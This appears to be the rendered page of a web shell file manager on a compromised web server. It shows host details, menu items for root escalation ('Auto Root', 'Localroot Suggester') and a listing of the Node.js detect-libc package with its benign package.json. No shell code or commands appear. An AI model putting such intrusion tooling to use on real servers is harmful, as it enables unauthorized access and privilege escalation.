Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
softmedya.net /
node_modules /
detect-libc /
Delete
Unzip
Name
Size
Permission
Date
Action
.trash7206
[ DIR ]
drwxr-xr-x
2025-12-13 08:15
lib
[ DIR ]
drwxr-xr-x
2025-10-09 13:40
LICENSE
11.09
KB
-rw-r--r--
2025-10-09 13:40
README.md
3.14
KB
-rw-r--r--
2025-10-09 13:40
index.d.ts
436
B
-rw-r--r--
2025-10-09 13:40
package.json
1.25
KB
-rw-r--r--
2025-10-09 13:40
Save
Rename
{ "name": "detect-libc", "version": "2.1.2", "description": "Node.js module to detect the C standard library (libc) implementation family and version", "main": "lib/detect-libc.js", "files": [ "lib/", "index.d.ts" ], "scripts": { "test": "semistandard && nyc --reporter=text --check-coverage --branches=100 ava test/unit.js", "changelog": "conventional-changelog -i CHANGELOG.md -s", "bench": "node benchmark/detect-libc", "bench:calls": "node benchmark/call-familySync.js && sleep 1 && node benchmark/call-isNonGlibcLinuxSync.js && sleep 1 && node benchmark/call-versionSync.js" }, "repository": { "type": "git", "url": "git://github.com/lovell/detect-libc.git" }, "keywords": [ "libc", "glibc", "musl" ], "author": "Lovell Fuller <npm@lovell.info>", "contributors": [ "Niklas Salmoukas <niklas@salmoukas.com>", "VinÃcius Lourenço <vinyygamerlol@gmail.com>" ], "license": "Apache-2.0", "devDependencies": { "ava": "^2.4.0", "benchmark": "^2.1.4", "conventional-changelog-cli": "^5.0.0", "eslint-config-standard": "^13.0.1", "nyc": "^15.1.0", "proxyquire": "^2.1.3", "semistandard": "^14.2.3" }, "engines": { "node": ">=8" }, "types": "index.d.ts" }